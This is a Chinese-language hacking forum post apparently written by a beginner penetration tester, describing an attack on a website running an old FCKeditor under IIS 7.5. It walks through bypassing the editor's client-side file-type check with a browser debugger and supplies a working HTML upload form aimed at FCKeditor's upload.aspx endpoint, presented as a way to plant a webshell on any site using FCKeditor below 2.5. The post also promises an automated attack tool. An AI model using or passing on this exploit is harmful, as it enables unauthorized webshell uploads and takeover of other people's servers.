热搜词
发表于 2016-7-18 09:46:10 | 显示全部楼层 |阅读模式
摘要:老思路: 第一步: 判断程序语言。 第二步: 查找解析环境。 第三步: 查找开源以及网络漏洞。 超克斯很快找到了存在FCK问题,那这就好解决了,大家都知道fck的漏洞网上爆了很多,加上IIS的解析漏洞完全可以秒杀。 但是很不幸的是这个站的IIS解析是IIS7.5 以...
老思路:  
第一步: 判断程序语言。
第二步: 查找解析环境。
第三步: 查找开源以及网络漏洞
    超克斯很快找到了存在FCK问题,那这就好解决了,大家都知道fck的漏洞网上爆了很多,加上IIS的解析漏洞完全可以秒杀。
但是很不幸的是这个站的IIS解析是IIS7.5 以及不存在了IIS 6 的畸形问题。

所以网上提出的什么上传图片马儿等问题全部失效了。
到这步我们进行查看一下fck版本吧。

很好,到这步开始我们我们就想办法查找,我是新手玩渗透,但是我相信只要是程序一定有漏洞。 这个版本是低级的,已经又高版本FCK了,如果我们要想渗透一套开源程序,特别是有升级版本的开源程序,只要你仔细考虑一定有漏洞。
一个公司的产品升级 有两方面: 一方面是 程序的应用性   另一方面是程序的安全性。  如果你发现这套程序升级了 大部分存在安全性问题。
在这个程序上, 的确存在上传图片马儿,根据IIS6.0 解析漏洞 直接访问马儿就行了,遇到这个没有解析的IIS7.5 你就别想着这个招了。
当时我看到编辑器页面我的直觉告诉我,这个地方应该是个突破口,然后我就想如何进行直接上传文件,绕过文件类型验证,功夫不负有心人,我挖到一个可以秒杀低版本的漏洞,给大家演示一下。
  
看到这块大家应该猜到了,这块在程序上前段进行类型上传验证了,我传了 fla 格式的文件可以成功,其他的不行了,我用火狐fixdebug 绕过验证试试。

把这块代码直接去掉 然后点击发送到服务器就可以传上去了再看看效果,

好了这里发送完后路径直接返回过来了,我们可以直接复制那个路径去浏览器执行

成功了

而且把代码下载下来 直接也可以进行远程提交,再提交页面直接查看源代码,里面就有路径,这个代码保存成 html 把网站改一下,可以直接传你的马儿
<form id="frmUpload" method="post" target="_blank" enctype="multipart/form-data" action="http://网址/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Flash" >
                <span fcklang="DlgLnkUpload">上传</span><br>
                <input id="txtUploadFile" style="WIDTH: 100%" size="40" name="NewFile" type="file"><br>
                <br>
                <input id="btnUpload" value="发送到服务器上" fcklang="DlgLnkBtnUpload" type="submit">
            </form>
测试效果如下:

上传完后,弹出新页面是空白,只要从源代码查看路径一览无遗

总结 到目前为止,只要存在 fck 2.5 以下的程序 不用在判断 IIS 了,可以直接传大马。 如果 超越2.5 就要用另外一种手段了,我在写一个程序工具针对FCK+IIS的 回头我写好了分享给大家,先看思路吧。
先展示一下程序的页面样式:


先看一下完成部分功能了,这今天完善好分给大家。


全部评论0
回复
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|Archiver|手机版|小黑屋|管理员之家 ( 苏ICP备2023053177号-2 )

GMT+8, 2024-11-22 23:53 , Processed in 0.165072 second(s), 23 queries .

Powered by Discuz! X3.5

Cpoyright © 2001-2024 Discuz! Team